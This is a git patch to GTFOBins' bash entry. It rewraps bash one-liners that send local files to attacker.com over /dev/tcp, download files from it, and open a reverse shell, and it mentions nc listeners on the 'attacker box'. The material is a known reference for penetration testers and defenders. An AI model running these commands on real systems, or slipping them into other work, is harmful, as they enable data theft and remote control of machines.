From fda972eeaaab30ef2b9620674012d0e76cfda898 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Thu, 24 May 2018 22:40:36 +0100
Subject: [PATCH] Wrapping bash commands

---
 _gtfobins/bash.md | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 3453984..ad39ca7 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -9,33 +9,33 @@ functions:
   upload:
     - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
       code: |
-        RHOST=attacker.com
-        RPORT=12345
-        LFILE=file_to_send
-        echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
+        export RHOST=attacker.com
+        export RPORT=12345
+        export LFILE=file_to_send
+        bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
     - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
       code: |
-        RHOST=attacker.com
-        RPORT=12345
-        LFILE=file_to_send
-        cat $LFILE > /dev/tcp/$RHOST/$RPORT
+        export RHOST=attacker.com
+        export RPORT=12345
+        export LFILE=file_to_send
+        bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
   download:
     - description: Fetch a remote file via HTTP GET request.
       code: |
-        RHOST=attacker.com
-        RPORT=12345
-        LFILE=file_to_get
-        (echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
+        export RHOST=attacker.com
+        export RPORT=12345
+        export LFILE=file_to_get
+        bash -c '(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d \"\r\")" != "" ]; do read i; done; cat) > $LFILE'
     - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
       code: |-
-        RHOST=attacker.com
-        RPORT=12345
-        LFILE=file_to_get
-        cat < /dev/tcp/$RHOST/$RPORT > $LFILE
+        export RHOST=attacker.com
+        export RPORT=12345
+        export LFILE=file_to_get
+        bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
   reverse-shell:
     - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
       code: |
-        RHOST=attacker.com
-        RPORT=12345
-        bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1
+        export RHOST=attacker.com
+        export RPORT=12345
+        bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
 ---